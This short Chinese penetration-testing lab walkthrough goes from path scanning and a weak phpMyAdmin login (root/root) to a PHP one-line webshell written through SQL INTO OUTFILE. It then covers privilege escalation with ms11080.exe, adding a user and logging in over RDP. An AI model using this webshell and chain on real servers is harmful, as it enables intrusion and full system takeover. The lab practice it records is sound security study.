拿到靶場 直接進行掃描 爆破路徑
發現 phpinfo, phpmyadmin 更具phpinfo 獲取跟路徑 也可以通過
輸入錯路徑爆出絕對路徑
phpmyamin 弱口令登錄 root,root
sql 直接寫一句話木馬
select '<?php eval($_POST[1])?>' into outfile 'C:\\phpStudy\\WWW\\1.php'
菜刀連接 上傳 ms11080.exe 提權 添加 90sec 用
mstsc 直接遠程登錄
免責聲明!
本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。